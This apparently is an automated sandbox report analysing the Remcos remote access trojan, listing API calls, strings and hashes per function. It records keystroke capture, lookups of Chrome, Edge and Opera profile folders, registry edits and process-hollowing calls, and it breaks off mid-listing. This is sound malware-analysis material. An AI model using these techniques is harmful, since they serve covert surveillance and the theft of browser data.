Opcode Fuzzy Hash: dd94839f5298d425d34c33682383094e81a47364d328da6cff6cdccbfe171a6b
Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF

Function 004484CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9

DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046B780,00000010,0043A9DB), ref: 0044852C
_free.LIBCMT ref: 0044853A

Strings

0]T, xrefs: 004484F4, 0044850A, 00448520, 00448532, 00448540

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: 0]T
API String ID: 1836352639-3090778742
Opcode ID: bf9b03ae5560feba4a6dffad266a5f0b3d53bc63c97ec9c6169899155bc6cddf
Instruction ID: e4a66ad6b61ce482acc1b9e2cae33de82c0ba6a550a62ff3290d8f8c14ed10e3
Opcode Fuzzy Hash: bf9b03ae5560feba4a6dffad266a5f0b3d53bc63c97ec9c6169899155bc6cddf
Instruction Fuzzy Hash: C3111231540214AFE710EF99E846B5D73B0BF04715F50412AF891DB3A2DBB8D8458B0D

Function 004017CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(0053DB38,00000020,?,?,00473A38,00471E78,?,00000000,004019F5), ref: 00401829
waveInAddBuffer.WINMM(0053DB38,00000020,?,00000000,004019F5), ref: 0040183F

Strings

0zS, xrefs: 004017D8

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: 0zS
API String ID: 2315374483-4237864368
Opcode ID: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
Instruction ID: 3a660176e7f8b230147204ba984e124cfbcdafa7022ac6de76214ba255081ced
Opcode Fuzzy Hash: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
Instruction Fuzzy Hash: 2F01AD76300205AFD7009F79EC44A29BBB9FB49314701813AF809C3772EB75AC118B98

Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040B484
UserProfile, xrefs: 0040B46E

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: b6b90106b0942584e4bab718b7201a0be85cbabe2790b160a6e2defc3a1b3ad2
Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
Opcode Fuzzy Hash: b6b90106b0942584e4bab718b7201a0be85cbabe2790b160a6e2defc3a1b3ad2
Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9

Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040B421
UserProfile, xrefs: 0040B40B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: ecb3c799a6769b9d5cb1a880d2bf6d263819ada574146216786c7dbbdc45bca2
Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
Opcode Fuzzy Hash: ecb3c799a6769b9d5cb1a880d2bf6d263819ada574146216786c7dbbdc45bca2
Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD

Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD

Strings

\Opera Software\Opera Stable\, xrefs: 0040B4E7
AppData, xrefs: 0040B4D1

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 844f1f43d5b359846dd9af1160d69e5aca714beb6ccccfa52de30f1871aca640
Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
Opcode Fuzzy Hash: 844f1f43d5b359846dd9af1160d69e5aca714beb6ccccfa52de30f1871aca640
Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD

Function 00440CE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00440D2E

Strings

@!S, xrefs: 00440CE5, 00440D14

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID: @!S
API String ID: 269201875-4045816191
Opcode ID: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
Instruction ID: 2da6b69c26c345968169ae82ae00459ec8aec7f537a5c8756946128e80711ba3
Opcode Fuzzy Hash: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
Instruction Fuzzy Hash: 5EE02B62A0553460F621273F3C49B6B15849BC137AF21033FF664861D1FF7C485A615E

Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040A597

Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A

Strings

[AltL], xrefs: 0040A5D9
[AltR], xrefs: 0040A5CD

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: aeeb78a5c443d10d52a26804ffa779b2a0c75437e402bbe4ee74375077af7b99
Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
Opcode Fuzzy Hash: aeeb78a5c443d10d52a26804ffa779b2a0c75437e402bbe4ee74375077af7b99
Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF

Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040A5F1

Strings

[CtrlR], xrefs: 0040A60E
[CtrlL], xrefs: 0040A61F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: beca56f48678838db2b0c84e402293e6c07756c41a634cf4ef6ffcea62ac2b9c
Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
Opcode Fuzzy Hash: beca56f48678838db2b0c84e402293e6c07756c41a634cf4ef6ffcea62ac2b9c
Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF

Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
RegDeleteValueW.ADVAPI32(?,?), ref: 00412436

Strings

6h@, xrefs: 00412414

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: 6h@
API String ID: 2654517830-73392143
Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664

Function 0043A9CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 004484CA: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046B780,00000010,0043A9DB), ref: 0044852C
Part of subcall function 004484CA: _free.LIBCMT ref: 0044853A

Part of subcall function 00448300: _free.LIBCMT ref: 00448322

DeleteCriticalSection.KERNEL32(00545D10), ref: 0043A9F7
_free.LIBCMT ref: 0043AA0B

Strings

0]T, xrefs: 0043A9DD, 0043A9EA, 0043AA10

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$CriticalDeleteSection
String ID: 0]T
API String ID: 1906768660-3090778742
Opcode ID: e5ac36b3ed681d96bb29fb15252be59f85a39ae6aa6e3a5f4908a70822c1effc
Instruction ID: d49f9847c972b922b2a5bd31cb464d080f037d7424c3f130f1981fc4ee97ab75
Opcode Fuzzy Hash: e5ac36b3ed681d96bb29fb15252be59f85a39ae6aa6e3a5f4908a70822c1effc
Instruction Fuzzy Hash: 7EE0D8328001109FD620BB5BFC4591A33E49F0D355B02443EFC85D3261DA79EC948B4E

Function 0044C4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0044C4EA
GetCommandLineW.KERNEL32 ref: 0044C4F5

Strings

%R, xrefs: 0044C4F0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: %R
API String ID: 3253501508-2309452963
Opcode ID: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
Instruction ID: ed7793de650037ca68a065bd14f32765b676cca72e00cc30cceafd45c2a83d08
Opcode Fuzzy Hash: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
Instruction Fuzzy Hash: A8B092788007008FCB108FB0B80C0143BA0B6182073C15176DC8EC3F22E7758008DF09

Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
GetLastError.KERNEL32 ref: 0043B4E9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799

Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
SetLastError.KERNEL32(0000007F), ref: 004106DF
SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

Analysis Process: GoogleUpdate.exePID: 7888, Parent PID: 7828COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1556
Total number of Limit Nodes:	52

Executed Functions

Function 0040D3F0 Relevance: 63.8, APIs: 17, Strings: 19, Instructions: 774
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603

Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992

Strings

Remcos Agent initialized, xrefs: 0040DA83
C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 0040D68F, 0040D8A7
license_code.txt, xrefs: 0040D465
`"G, xrefs: 0040DCA3
Exe, xrefs: 0040D539
origmsc, xrefs: 0040D6F7
H"G, xrefs: 0040D904
exepath, xrefs: 0040D931, 0040D9DB
(#G, xrefs: 0040D596
Attempt-S4A0CI, xrefs: 0040D52A, 0040D586, 0040D656
H"G, xrefs: 0040D9B8
Access Level: , xrefs: 0040DD3D
Software\, xrefs: 0040D4E6
Administrator, xrefs: 0040DD08
User, xrefs: 0040DD2C
0gj, xrefs: 0040D8AC, 0040D8B6, 0040D8F2, 0040D919, 0040D9F6
Exe, xrefs: 0040D534
licence, xrefs: 0040DA22
Inj, xrefs: 0040D626, 0040D62C, 0040D641

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
String ID: (#G$0gj$Access Level: $Administrator$Attempt-S4A0CI$C:\ProgramData\GoogleDat\GoogleUpdate.exe$Exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc
API String ID: 1529173511-3621782200
Opcode ID: 104a3c9b241d2f1ac50294723b8b2fc91c88932e73af8d88d8c9125c77f10c2a
Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
Opcode Fuzzy Hash: 104a3c9b241d2f1ac50294723b8b2fc91c88932e73af8d88d8c9125c77f10c2a
Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

Function 0041642D Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000,?,00472200), ref: 00416474
GetProcAddress.KERNEL32(00000000), ref: 00416477
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,00472200), ref: 00416488
GetProcAddress.KERNEL32(00000000), ref: 0041648B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,00472200), ref: 0041649C
GetProcAddress.KERNEL32(00000000), ref: 0041649F
GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,00472200), ref: 004164B0
GetProcAddress.KERNEL32(00000000), ref: 004164B3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,00472200), ref: 00416555
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,?,00472200), ref: 0041656D
Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 00416583
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,00472200), ref: 004165A9
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004165D1
NtUnmapViewOfSection.NTDLL(?,?), ref: 004165F9
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00416619
